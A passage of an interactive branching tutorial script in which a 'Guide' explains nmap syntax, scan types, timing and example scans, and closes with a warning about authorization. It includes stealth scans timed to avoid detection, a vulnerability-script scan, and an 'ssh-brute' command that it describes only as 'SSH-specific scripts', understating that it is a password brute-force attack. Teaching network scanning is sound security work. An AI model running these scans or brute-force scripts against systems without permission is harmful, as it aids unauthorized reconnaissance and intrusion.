nmap_scan_types + +* [Show me examples] + -> nmap_examples + +// ---------------- +// Basic scanning +// ---------------- + +=== nmap_basic_scan === + +Guide: The basic syntax is simple: `nmap [target]` + +Guide: For example: +`nmap 192.168.1.1` + +Guide: This performs a default scan of the 1,000 most common ports on that IP address. It's quick but not comprehensive. + +Guide: **Common useful flags:** + +Guide: `-p` specifies ports: +- `nmap -p 80,443 192.168.1.1` (scan specific ports) +- `nmap -p 1-65535 192.168.1.1` (scan all ports) +- `nmap -p- 192.168.1.1` (shorthand for all ports) + +Guide: `-sV` detects service versions: +`nmap -sV 192.168.1.1` tells you not just that port 80 is open, but that it's running Apache 2.4.41 + +Guide: `-O` attempts OS detection: +`nmap -O 192.168.1.1` tries to identify what operating system the target is running + +Guide: `-A` enables aggressive scanning (OS detection, version detection, script scanning): +`nmap -A 192.168.1.1` gives you comprehensive information + +* [What are the different scan types?] + -> nmap_scan_types + +* [Show me more examples] + -> nmap_examples + +* [Explain ports again] + -> nmap_ports_explained + +* [I'm ready to practice] + -> nmap_end + +// ---------------- +// Scan types +// ---------------- + +=== nmap_scan_types === + +Guide: nmap offers different scan types for different situations: + +Guide: **TCP Connect Scan** (`-sT`): +The default if you're not root. Completes full TCP handshake. Reliable but noisy—easy to detect and log. + +Guide: **SYN Scan** (`-sS`): +The "stealth scan"—sends SYN packets but doesn't complete the handshake. Faster and less detectable. Requires root privileges. This is the default if you run nmap as root. + +Guide: **UDP Scan** (`-sU`): +Scans UDP ports instead of TCP. Slower and less reliable, but important because many services use UDP (DNS, SNMP, DHCP). +Example: `nmap -sU 192.168.1.1` + +Guide: **Version Detection** (`-sV`): +Not just "port 80 is open" but "Apache httpd 2.4.41 is running on port 80". Crucial for identifying vulnerabilities. + +Guide: **Aggressive Scan** (`-A`): +Enables OS detection, version detection, script scanning, and traceroute. Comprehensive but very noisy. + +Guide: **Timing** (`-T0` through `-T5`): +Controls scan speed. `-T0` (paranoid) is extremely slow and stealthy. `-T4` (aggressive) is fast but noisy. `-T3` (normal) is the default. + +* [Show me practical examples] + -> nmap_examples + +* [How do I scan for open ports?] + -> nmap_basic_scan + +* [What are ports again?] + -> nmap_ports_explained + +* [I understand now] + -> nmap_end + +// ---------------- +// Practical examples +// ---------------- + +=== nmap_examples === + +Guide: Let's walk through practical scenarios: + +Guide: **Scenario 1: Quick network check** +`nmap 192.168.1.0/24` +Scans all 256 addresses in your local network to see what's alive and what common ports are open. + +Guide: **Scenario 2: Thorough single host scan** +`nmap -sV -sC -O -p- 192.168.1.50` +Scans all 65,535 ports, detects service versions, runs default scripts, and attempts OS detection. Takes longer but gives comprehensive results. + +Guide: **Scenario 3: Stealth scan of web services** +`nmap -sS -p 80,443 -T2 192.168.1.50` +SYN scan of web ports with slower timing to avoid detection. + +Guide: **Scenario 4: Quick vulnerability check** +`nmap -sV --script vuln 192.168.1.50` +Runs vulnerability detection scripts against identified services. + +Guide: **Scenario 5: Check specific service** +`nmap -p 22 --script ssh-brute 192.168.1.50` +Scans port 22 and runs SSH-specific scripts. + +Guide: **Reading the output:** +``` +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.9 +80/tcp open http Apache httpd 2.4.41 +3306/tcp closed mysql +8080/tcp filtered http-proxy +``` + +Guide: - **open**: Service is listening and accepting connections +- **closed**: Port is accessible but no service is listening +- **filtered**: Firewall or filter is blocking access + +* [Tell me about scan types] + -> nmap_scan_types + +* [Explain the basics again] + -> nmap_basic_scan + +* [What are ports?] + -> nmap_ports_explained + +* [I'm ready to use nmap] + -> nmap_end + +// ---------------- +// End +// ---------------- + +=== nmap_end === + +Guide: Remember: nmap is powerful, but scanning networks you don't own or have permission to test is illegal. + +Guide: Always get written authorization before scanning. "I thought it was okay" is not a legal defense. + +Guide: Use nmap responsibly. It's a professional tool that requires professional ethics. + +-> END